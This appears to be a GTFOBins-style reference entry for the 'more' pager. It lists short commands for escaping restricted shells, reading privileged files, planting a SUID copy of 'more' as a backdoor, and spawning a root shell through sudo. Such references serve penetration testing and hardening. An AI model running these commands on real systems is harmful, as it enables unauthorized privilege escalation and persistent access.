It can be used to break out from restricted environments by spawning an interactive system shell.
TERM= more /etc/profile !/bin/sh
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run
sh -p, omit the
-p argument on systems like Debian (<= Stretch) that allow the default
sh shell to run with SUID privileges.
sudo sh -c 'cp $(which more) .; chmod +s ./more' ./more file_to_read
It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on
TERM= sudo -E more /etc/profile !/bin/sh